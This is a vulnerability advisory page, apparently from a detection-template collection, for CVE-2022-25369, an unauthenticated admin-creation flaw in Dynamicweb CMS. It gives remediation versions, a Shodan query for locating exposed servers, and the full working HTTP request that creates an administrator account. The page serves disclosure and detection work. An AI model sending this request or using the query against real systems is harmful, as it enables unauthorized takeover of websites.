🔙 목록으로 돌아가기

CVE-2022-25369: Dynamicweb 9.5.0 - 9.12.7 Unauthenticated Admin User Creation

TitleDynamicweb 9.5.0 - 9.12.7 Unauthenticated Admin User Creation
Authorpdteam
SeverityCritical
ImpactUnauthenticated attackers can create administrative user accounts through the unprotected Default.aspx endpoint, gaining complete control over the Dynamicweb CMS, its content, and potentially the underlying system.
RemediationUpgrade to one of the fixed versions or higher: Dynamicweb 9.5.9, 9.6.16, 9.7.8, 9.8.11, 9.9, 9.10.18, 9.12.8, or 9.13.0.
CVSS Score9.8
CVE IDCVE-2022-25369
CWE IDCWE-425
Shodan Queryhttp.component:"Dynamicweb"
Tags cve2022 cve dynamicweb rce unauth vkev vuln

🔍 Vulnerability Description

Dynamicweb contains a vulnerability which allows an unauthenticated attacker to create a new administrative user.

🌐 HTTP Request

GET /Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername=CIu3U0&adminpassword=KR0Cmh&adminemail=test@test.com&adminname=test HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-25369.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-25369.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A